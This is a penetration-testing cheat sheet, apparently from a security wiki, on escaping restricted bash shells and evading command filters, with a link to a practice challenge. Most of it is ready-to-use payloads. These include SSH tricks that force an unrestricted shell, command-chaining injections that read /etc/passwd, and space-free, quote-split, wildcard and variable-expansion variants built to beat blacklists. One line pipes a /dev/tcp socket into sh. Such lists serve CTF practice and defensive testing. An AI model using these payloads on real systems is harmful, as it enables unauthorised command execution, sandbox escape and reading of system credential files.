Restricted shells
Bypass restricted shells
Example for restricted shell
root@Desktop: ~ #ssh -6 user@fe80::XXXXX:2c74%wlan0
user@fe80::XXXXX:2c74%wlan0 's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-34-generic x86_64)
Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
Support: https://ubuntu.com/advantage
Last login: Fri Jul 12 14:15:45 2019 from fe80::XXXXX:2c74%wlan0
jail@HOST:~$ -rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: -a0': invalid number specifier
user@HOST:~$ vim
-rbash: /usr/lib/command-not-found: restricted: cannot specify /' in command names
jail@HOST:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify /' in command names
Connection to fe80::XXXXX:2c74%wlan0 closed.
First:
Check 'echo $PATH'
Ls to check what command in the $path (ls -l /home/student/.bin)
Fix path export PATH=/bin:/usr/bin
Enumeration Linux Environment Enumeration is the most important part. We need to enumeration the Linux environmental to check what we can do to bypass the rbash.
We need to enumerate :
First we must to check for available commands like cd/ls/echo etc.
We must to check for operators like >,>>,<,|.
We need to check for available programming languages like perl,ruby,python etc.
Which commands we can run as root (sudo -l).
Check for files or commands with SUID perm.
You must to check in what shell you are : echo $SHELL you will be in rbash by 90%
Check for the Environmental Variables : run env or printenv Now let’s move into Common Exploitation Techniques.
Practice
Practice restricted shell escape: https://www.root-me.org/en/Challenges/App-Script/Bash-Restricted-shells
SSH
ssh [email protected] -t bash
Or
ssh [email protected] -t /bin/bash
Or
ssh [email protected] -t "bash --noprofile"
Add Path
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Chaining commands
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls Only if the first cmd fail
Inside a command
original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)
Filter Bypasses
Bypass without space
Works on Linux only.
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/4242
Commands execution without spaces, $ or { } - Linux (Bash only)
IFS=,;`cat<<<uname,-a
Works on Windows only.
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
Bypass with a line return
something%0Acat%20/etc/passwd
Bypass Blacklisted words
Bypass with single quote
w'h'o'am'i
Bypass with double quote
w"h"o"am"i
Bypass with backslash and slash
w\ho\am\i
/\b\i\n/////s\h
Bypass with $@
who$@ami
echo $0
-> /usr/bin/zsh
echo whoami|$0
Bypass with variable expansion
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
Bypass with wildcards
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
Last updated
Was this helpful?